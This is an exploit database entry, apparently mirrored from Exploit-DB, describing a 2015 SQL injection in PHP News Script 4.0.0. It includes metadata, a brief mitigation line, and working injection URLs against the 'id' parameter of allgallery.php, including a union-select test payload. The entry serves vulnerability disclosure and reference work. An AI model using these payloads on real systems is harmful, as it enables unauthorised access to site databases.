header-logo
Suggest Exploit
vendor:
PHP News Script
by:
Meisam Monsef
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP News Script
Affected Version From: 4.0.0
Affected Version To: 4.0.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:phpnewsscript:php_news_script:4.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS
2015

PHP News Script 4.0.0 Sql Injection

An attacker can inject arbitrary SQL commands into the 'id' parameter of the 'allgallery.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS

Exploit :
http://server/allgallery.php?id=-9999%27+[sql-command]+%23

Test :
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23

Navigation

Suggest Exploit

Services By CQR